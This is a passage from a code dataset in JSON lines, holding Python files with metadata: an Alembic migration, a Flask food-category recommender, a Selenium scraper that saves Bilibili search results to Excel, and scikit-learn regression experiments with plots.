{"api_name": "discord.Interaction", "line_number": 239, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 240, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 263, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 264, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 265, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 266, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 266, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 267, "usage_type": "name"}, {"api_name": "discord.app_commands.rename", "line_number": 261, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 261, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 295, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 294, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 294, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 294, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 310, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 309, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 309, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 309, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 325, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 324, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 324, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 324, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 343, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 358, "usage_type": "call"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 342, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 342, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 342, "usage_type": "name"}, {"api_name": "discord.VoiceChannel", "line_number": 368, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 369, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 415, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 442, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 442, "usage_type": "name"}, {"api_name": "discord.VoiceChannel", "line_number": 443, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 451, "usage_type": "call"}, {"api_name": "asyncio.Event", "line_number": 452, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 454, "usage_type": "call"}, {"api_name": "discord.Guild", "line_number": 462, "usage_type": "attribute"}, {"api_name": "discord.utils.get", "line_number": 464, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 464, "usage_type": "name"}, {"api_name": "discord.HTTPException", "line_number": 468, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 481, "usage_type": "call"}, {"api_name": "asyncio.create_task", "line_number": 484, "usage_type": "call"}, {"api_name": "discord.CategoryChannel", "line_number": 503, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 504, "usage_type": "name"}, {"api_name": "bot.common.extension_setup", "line_number": 528, "usage_type": "call"}]}
+{"seq_id": "15800119886", "text": "\"\"\"add tables\n\nRevision ID: d2615228dcac\nRevises: 32505b1f2d53\nCreate Date: 2023-05-04 08:52:41.545752\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd2615228dcac'\ndown_revision = '32505b1f2d53'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('text', sa.String(length=255), nullable=False),\n sa.Column('author', sa.String(length=20), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('post_user_likes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.UUID(), nullable=True),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('post_user_likes')\n op.drop_table('post')\n # ### end Alembic commands ###\n", "repo_name": "AVyha/social_network", "sub_path": "alembic/versions/d2615228dcac_add_tables.py", "file_name": "d2615228dcac_add_tables.py", "file_ext": "py", "file_size_in_byte": 1206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.UUID", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 40, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 40, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 41, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 41, "usage_type": "name"}]}
+{"seq_id": "71127997289", "text": "from flask import Flask, render_template, request\nimport pickle\nimport pandas as pd\n\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef Home():\n if request.method == 'POST':\n model = pickle.load(open('food_recommendation_model.pkl', 'rb'))\n calories = float(request.form[\"calories\"])\n carbohydrates = float(request.form['carbohydrates'])\n fats = float(request.form['fats'])\n protein = float(request.form['protein'])\n\n Measure = 0.25\n Grams = 1\n Calories = calories\n Protein = protein\n Fat = fats\n Sat_Fat = 0.102564103\n Fiber = 0.0\n Carbs = carbohydrates\n\n input_data = pd.DataFrame({\n 'Measure': [Measure],\n 'Grams': [Grams],\n 'Calories': [Calories],\n 'Protein': [Protein],\n 'Fat': [Fat],\n 'Sat.Fat': [Sat_Fat],\n 'Fiber': [Fiber],\n 'Carbs': [Carbs]\n })\n\n prediction = model.predict(input_data)\n\n food_dict = {\n 1: 'Breads, cereals, fastfood,grains (e.g., bread, rice, pasta)',\n 2: 'Meat, Poultry (e.g., chicken, beef, pork)',\n 3: 'Desserts, sweets (e.g., cookies, cakes, candies)',\n 4: 'Dairy products (e.g., milk, cheese, yogurt)',\n 5: 'Vegetables A-E (e.g., asparagus, broccoli, carrots)',\n 6: 'Vegetables R-Z (e.g., radishes, zucchini, squash)',\n 7: 'Fruits G-P (e.g., grapes, oranges, peaches)',\n 8: 'Fruits A-F (e.g., apples, bananas, cherries)',\n 9: 'Fish, Seafood (e.g., salmon, shrimp, tuna)',\n 10: 'Fats, Oils, Shortenings (e.g., butter, olive oil, lard)',\n 11: 'Vegetables F-P (e.g., fennel, lettuce, peppers)',\n 12: 'Seeds and Nuts (e.g., almonds, peanuts, sunflower seeds)',\n 13: 'Drinks,Alcohol, Beverages (e.g., water, soda, wine)',\n 14: 'Soups (e.g., chicken soup, tomato soup, vegetable soup)',\n 15: 'Fruits R-Z (e.g., raspberries, strawberries, watermelon)',\n 16: 'Jams,Jellies (e.g., strawberry jam, grape jelly, marmalade)'\n }\n\n if prediction[0] in food_dict:\n print(prediction[0])\n recommended_food_category = food_dict[prediction[0]]\n result = f\"The recommended food category is: {recommended_food_category}\"\n else:\n result = \"Sorry, we are not able to recommend a proper food category for this environment.\"\n\n # user_input = [Measure,Grams,Calories,Protein,Fat,Sat.Fat,Fiber,Carbs]\n # user_input = [0.25, 0.991, 0.665322581, 0.141630901,\n # 0.17167382, 0.153846154, 0, 0.203389831]\n\n result_html = process_user_input(result)\n\n return result_html\n return render_template('index.html')\n\n\ndef process_user_input(result):\n # Replace this with your actual data processing logic\n\n # Generate HTML for the results\n # result_html = ''\n # for item in result:\n # result_html += f'{item} '\n # result_html += ' '\n\n return ''+result+'
'\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "Riya2812/NFC_CodeRunners", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 3168, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 11, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 73, "usage_type": "call"}]}
+{"seq_id": "29960524565", "text": "from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport xlwt\nimport bs4\nfrom selenium.webdriver.chrome.options import Options\n\n# 浏览器初始化\noptions = Options()\noptions.add_argument('--headless')\nbrowser=webdriver.Chrome(options=options)\nWAIT=WebDriverWait(browser,10)\nbrowser.set_window_size(1400, 900)\nbrowser.get('https://www.bilibili.com/')\n\n# 数据库初始化\n\ndef searchB(src):\n\n # 表格初始化(仅用于表格储存信息模式)\n book = xlwt.Workbook(src, style_compression=0)\n sheet = book.add_sheet(src, cell_overwrite_ok=True)\n sheet.write(0, 0, '名称')\n sheet.write(0, 1, '地址')\n sheet.write(0, 2, '描述')\n sheet.write(0, 3, '观看次数')\n sheet.write(0, 4, '弹幕数')\n sheet.write(0, 5, '发布时间')\n sheet.write(0, 6, 'Up主')\n n = 1\n\n\n def search():\n try:\n print(\"开始尝试访问b站...\")\n input = WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#nav_searchform > input\")))\n submit = WAIT.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#nav_searchform > div > button')))\n\n input.send_keys(src)\n submit.click()\n\n print(\"搜索成功,转到新窗口\")\n all_h = browser.window_handles\n browser.switch_to.window(all_h[1])\n getPage()\n\n total = WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.last > button'))).text\n print('总页数为' + total)\n return int(total)\n except TimeoutException:\n print('访问超时,尝试重新访问...')\n return search()\n\n def getPage():\n WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#all-list > div.flow-loader > div.filter-wrap')))\n html = browser.page_source\n soup = bs4.BeautifulSoup(html, 'lxml')\n save_data_to_excel(soup)\n\n def save_data_to_excel(soup):\n list = soup.find(class_='video-list clearfix').find_all(class_='video-item matrix')\n for item in list:\n item_title = item.find('a').get('title')\n item_link = item.find('a').get('href')\n item_des = item.find(class_='des hide').text.strip()\n item_playtime = item.find(class_='so-icon watch-num').text.strip()\n if item_playtime.endswith('万'):\n item_playtime=float(item_playtime[:-1])*1000\n item_playtime=int(item_playtime)\n item_subtitle = item.find(class_='so-icon hide').text.strip()\n if item_subtitle.endswith('万'):\n item_subtitle=float(item_subtitle[:-1])*1000\n item_subtitle=int(item_subtitle)\n item_time = item.find(class_='so-icon time').text.strip()\n item_up = item.find(class_='up-name').text\n\n print(\"读取 | \" + item_title)\n nonlocal n\n\n sheet.write(n, 0, item_title)\n sheet.write(n, 1, item_link)\n sheet.write(n, 2, item_des)\n sheet.write(n, 3, item_playtime)\n sheet.write(n, 4, item_subtitle)\n sheet.write(n, 5, item_time)\n sheet.write(n, 6, item_up)\n\n n += 1\n\n def next_page(des_page):\n try:\n print('读取下一页...')\n next_btn = WAIT.until(EC.element_to_be_clickable((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.next > button')))\n next_btn.click()\n WAIT.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.active > button'),\n str(des_page)))\n getPage()\n except TimeoutException:\n print('访问超时,尝试刷新中...')\n browser.refresh()\n next_page(des_page)\n\n total = search()\n\n for i in range(2, total + 1):\n next_page(i)\n\n browser.close()\n\n # 保存表格(仅用于表格存储时)\n book.save(src+'.xls')\n\nif __name__ =='__main__':\n src=input(\"请输入要搜索的内容:\")\n searchB(src)", "repo_name": "jingjiecb/PythonSpider", "sub_path": "learn/selenium/bilibili.py", "file_name": "bilibili.py", "file_ext": "py", "file_size_in_byte": 4575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 14, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 38, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 38, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 39, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 49, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 58, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 58, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 58, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 58, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 60, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 96, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 96, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 96, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 96, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.text_to_be_present_in_element", "line_number": 99, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 99, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 99, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 99, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 103, "usage_type": "name"}]}
+{"seq_id": "31314452787", "text": "import sys, datetime, pdb, time\nsys.path.append(\"/usr/lib/python3/dist-packages\")\nsys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\nsys.path.append(\"/home/ubuntu/workspace/ml_dev_work\")\nimport matplotlib as mpl\nmpl.use('Agg')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import cross_val_score, train_test_split\nfrom sklearn.metrics import r2_score, mean_squared_error\nfrom sklearn.linear_model import LinearRegression, RANSACRegressor\nfrom sklearn.preprocessing import StandardScaler, PolynomialFeatures\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import Ridge, ElasticNet, Lasso\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom utils.ml_utils import plot_decision_regions, standardize, IMG_PATH, lin_regplot\nfrom algorithms.linear_regression_gd import LinearRegressionGD\n\n\n\ndef heat_map(df, xcols):\n y = df['target']\n X = df[list(xcols)]\n cols = ['target_proxy'] + list(xcols)\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n sns.set(style='whitegrid', context='notebook') \n sns.pairplot(df[cols], size=2.5) \n plt.tight_layout() \n plt.savefig(IMG_PATH + 'corr_mat.png', dpi=300)\n plt.close()\n \n cm = np.corrcoef(df[cols].values.T)\n sns.set(font_scale=1.5)\n hm = sns.heatmap(cm, \n cbar=True,\n annot=True, \n square=True,\n fmt='.2f',\n annot_kws={'size': 15},\n yticklabels=cols,\n xticklabels=cols)\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'heat_map.png', dpi=300)\n plt.close()\n \ndef linear_regressor(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n lr = LinearRegressionGD()\n lr.fit(np.transpose(np.array([X_train])), y_train)\n plt.plot(range(1, lr.n_iter+1), lr.cost_)\n plt.ylabel('SSE')\n plt.xlabel('Epoch')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'cost.png', dpi=300)\n plt.close()\n \n lin_regplot(np.transpose(np.array([X_train])), y_train, lr)\n plt.savefig(IMG_PATH + 'lin_reg_cost.png', dpi=300)\n plt.close()\n \n # Find the average return of a stock with PE = 20\n # Note: will give odd results if x values are standardized and input is not\n y_val_std = lr.predict([20.0])\n print(\"Estimated Return: %.3f\" % y_val_std)\n print('Slope: %.3f' % lr.w_[1])\n print('Intercept: %.3f' % lr.w_[0])\n\ndef linear_regression_sklearn(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n X = np.transpose(np.array([X])) \n slr = LinearRegression()\n slr.fit(X, y.values)\n y_pred = slr.predict(X)\n print('Slope: %.3f' % slr.coef_[0])\n print('Intercept: %.3f' % slr.intercept_)\n \n lin_regplot(X, y.values, slr)\n plt.xlabel('x val')\n plt.ylabel('Return')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'scikit_lr_fit.png', dpi=300)\n plt.close()\n\n # Closed-form solution\n Xb = np.hstack((np.ones((X.shape[0], 1)), X))\n w = np.zeros(X.shape[1])\n z = np.linalg.inv(np.dot(Xb.T, Xb))\n w = np.dot(z, np.dot(Xb.T, y))\n print('Slope: %.3f' % w[1])\n print('Intercept: %.3f' % w[0])\n \ndef ransac(df, xcols):\n # function to deal with outliers\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n ransac = RANSACRegressor(LinearRegression(), \n max_trials=100, \n min_samples=50, \n residual_metric=lambda x: np.sum(np.abs(x), axis=1), \n residual_threshold=5.0, \n random_state=0)\n \n ransac.fit(X, y)\n inlier_mask = ransac.inlier_mask_\n outlier_mask = np.logical_not(inlier_mask)\n line_X = np.arange(3, 10, 1)\n line_y_ransac = ransac.predict(line_X[:, np.newaxis])\n plt.scatter(X[inlier_mask], y[inlier_mask], c='blue', marker='o', label='Inliers')\n plt.scatter(X[outlier_mask], y[outlier_mask], c='lightgreen', marker='s', label='Outliers')\n plt.plot(line_X, line_y_ransac, color='red') \n plt.xlabel('x-val')\n plt.ylabel('Returns')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'ransac_fit.png', dpi=300)\n plt.close()\n \ndef polynomial_regression(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n lr = LinearRegression()\n pr = LinearRegression()\n quadratic = PolynomialFeatures(degree=2)\n X_quad = quadratic.fit_transform(X)\n # fit linear features\n lr.fit(X, y)\n X_fit = np.arange(-2,50,1)[:, np.newaxis]\n y_lin_fit = lr.predict(X_fit)\n \n # fit quadratic features\n pr.fit(X_quad, y)\n y_quad_fit = pr.predict(quadratic.fit_transform(X_fit))\n \n # plot results\n plt.scatter(X, y.values, label='training points')\n plt.plot(X_fit, y_lin_fit, label='linear fit', linestyle='--')\n plt.plot(X_fit, y_quad_fit, label='quadratic fit')\n plt.legend(loc='best')\n \n plt.tight_layout()\n plt.savefig(IMG_PATH + 'poly_regression.png', dpi=300)\n plt.close()\n \n y_lin_pred = lr.predict(X)\n y_quad_pred = pr.predict(X_quad)\n print('Training MSE linear: %.3f, quadratic: %.3f' % ( \n mean_squared_error(y, y_lin_pred), \n mean_squared_error(y, y_quad_pred))) \n print('Training R^2 linear: %.3f, quadratic: %.3f' % ( \n r2_score(y, y_lin_pred), \n r2_score(y, y_quad_pred)))\n\ndef nonlinear(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n regr = LinearRegression() \n \n # create quadratic features \n quadratic = PolynomialFeatures(degree=2) \n cubic = PolynomialFeatures(degree=3) \n X_quad = quadratic.fit_transform(X) \n X_cubic = cubic.fit_transform(X) \n \n # fit features \n X_fit = np.arange(X.min(), X.max(), 1)[:, np.newaxis] \n \n regr = regr.fit(X, y) \n y_lin_fit = regr.predict(X_fit) \n linear_r2 = r2_score(y, regr.predict(X)) \n \n regr = regr.fit(X_quad, y) \n y_quad_fit = regr.predict(quadratic.fit_transform(X_fit)) \n quadratic_r2 = r2_score(y, regr.predict(X_quad)) \n \n regr = regr.fit(X_cubic, y) \n y_cubic_fit = regr.predict(cubic.fit_transform(X_fit)) \n cubic_r2 = r2_score(y, regr.predict(X_cubic)) \n \n \n # plot results \n plt.scatter(X, y, label='training points', color='lightgray') \n \n plt.plot(X_fit, y_lin_fit, \n label='linear (d=1), $R^2=%.2f$' % linear_r2, \n color='blue', \n lw=2, \n linestyle=':') \n \n plt.plot(X_fit, y_quad_fit, \n label='quadratic (d=2), $R^2=%.2f$' % quadratic_r2, \n color='red', \n lw=2, \n linestyle='-') \n \n plt.plot(X_fit, y_cubic_fit, \n label='cubic (d=3), $R^2=%.2f$' % cubic_r2, \n color='green', \n lw=2, \n linestyle='--') \n \n plt.xlabel('x-val') \n plt.ylabel('Return') \n plt.legend(loc='best') \n plt.tight_layout()\n plt.savefig(IMG_PATH + 'nonlinear_regr.png', dpi=300)\n plt.close()\n \n pdb.set_trace()\n # transform features\n X_log = np.log(X)\n y_sqrt = np.sqrt(y)\n \n # fit features\n X_fit = np.arange(X_log.min()-1, X_log.max()+1, 1)[:, np.newaxis]\n regr = regr.fit(X_log, y_sqrt)\n y_lin_fit = regr.predict(X_fit)\n linear_r2 = r2_score(y_sqrt, regr.predict(X_log))\n \n # plot results\n plt.scatter(X_log, y_sqrt, label='training points', color='lightgray')\n plt.plot(X_fit, y_lin_fit, \n label='linear (d=1), $R^2=%.2f$' % linear_r2, \n color='blue', \n lw=2)\n \n plt.xlabel('x-val')\n plt.ylabel('Return')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'sqrt_log.png', dpi=300)\n\ndef random_forest_regression(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n tree = DecisionTreeRegressor(max_depth=3)\n tree.fit(X, y)\n sort_idx = X.flatten().argsort()\n lin_regplot(X[sort_idx], y[sort_idx], tree)\n plt.xlabel('x-val')\n plt.ylabel('Return')\n plt.savefig(IMG_PATH + 'tree_regression.png', dpi=300)\n plt.close()\n \n forest = RandomForestRegressor(n_estimators=1000, \n criterion='mse', \n random_state=1, \n n_jobs=-1)\n forest.fit(X_train, y_train)\n y_train_pred = forest.predict(X_train)\n y_test_pred = forest.predict(X_test)\n print('MSE train: %.3f, test: %.3f' % (\n mean_squared_error(y_train, y_train_pred),\n mean_squared_error(y_test, y_test_pred)))\n print('R^2 train: %.3f, test: %.3f' % (\n r2_score(y_train, y_train_pred),\n r2_score(y_test, y_test_pred)))\n \n plt.scatter(y_train_pred, \n y_train_pred - y_train, \n c='black', \n marker='o', \n s=35, \n alpha=0.5, \n label='Training data') \n plt.scatter(y_test_pred, \n y_test_pred - y_test, \n c='lightgreen', \n marker='s', \n s=35, \n alpha=0.7, \n label='Test data') \n plt.xlabel('Predicted values') \n plt.ylabel('Residuals') \n plt.legend(loc='best') \n plt.hlines(y=0, xmin=-10, xmax=50, lw=2, color='red') \n plt.xlim([-10, 50]) \n plt.tight_layout()\n plt.savefig(IMG_PATH + 'slr_residuals.png', dpi=300)", "repo_name": "mccarvik/python_for_finance", "sub_path": "research/ml_analysis/scripts/continuous_variables.py", "file_name": "continuous_variables.py", "file_ext": "py", "file_size_in_byte": 11348, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 7, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 35, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 37, "usage_type": "call"}, {"api_name": "seaborn.pairplot", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.corrcoef", "line_number": 43, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 44, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, 